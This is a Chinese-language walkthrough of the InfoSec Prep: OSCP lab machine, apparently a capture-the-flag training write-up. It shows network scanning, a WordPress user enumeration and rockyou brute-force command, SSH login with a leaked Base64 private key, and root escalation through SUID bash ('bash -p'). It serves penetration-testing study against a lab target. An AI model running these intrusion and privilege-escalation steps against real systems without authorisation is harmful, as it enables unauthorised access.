INFOSEC PREP: OSCP
字数 717 2025-08-19 12:42:36
OSCP渗透测试实战教学文档
环境信息
- 攻击机IP: 192.168.44.128
- 靶机IP: 192.168.44.130
信息收集阶段
1. 主机存活发现
使用以下工具确定靶机IP:
nmap -sn 192.168.44.0/24 # 使用ICMP ping扫描整个子网
arp-scan -I eth0 -l # 使用ARP协议扫描本地网络
2. 端口扫描
关键发现:
- 存在两条潜在攻击路径:
- 找到SSH账号和密码进行远程连接
- 利用前端Web应用漏洞
3. 目录扫描
重要发现:
- 检查
robots.txt文件,发现secret.txt secret.txt内容为Base64编码,解码后获得SSH私钥- 将私钥保存为
id_rsa文件:
echo "Base64编码内容" | base64 -d > id_rsa
chmod 600 id_rsa # 设置适当权限
前端Web测试
WordPress分析
- 目标运行WordPress 5.4.2
- 使用
wpscan工具进行扫描:
wpscan --url http://192.168.44.130 --enumerate u # 枚举用户
- 发现唯一用户
admin,但爆破失败:
wpscan --url http://192.168.44.130 -eu -P /usr/share/wordlists/rockyou.txt
关键发现
- 网站首页包含重要提示:唯一用户为"oscp"
- 使用该用户通过SSH私钥成功登录:
ssh -i id_rsa oscp@192.168.44.130
权限提升
1. sudo权限检查
sudo -l # 需要密码,此路不通
2. SUID提权
查找具有SUID位的可执行文件:
find / -perm -u=s -type f 2>/dev/null
关键发现:
/usr/bin/bash具有SUID位- 使用GTFOBins方法提权:
/usr/bin/bash -p # -p参数保留特权
whoami # 验证是否为root
3. 获取flag
进入root目录获取flag完成挑战。
关键工具与技术总结
-
信息收集工具:
- nmap
- arp-scan
- 目录扫描工具(如dirb, dirsearch等)
-
WordPress测试:
- wpscan
- 用户枚举与密码爆破
-
权限提升技术:
- SUID提权
- GTFOBins利用
-
其他技术:
- Base64解码
- SSH私钥使用
学习要点
- 永远仔细阅读网站内容,关键信息可能隐藏在显眼位置
- 多种工具组合使用可提高成功率
- 当一种攻击路径受阻时,及时尝试其他方法
- 熟悉常见提权技术(如SUID)至关重要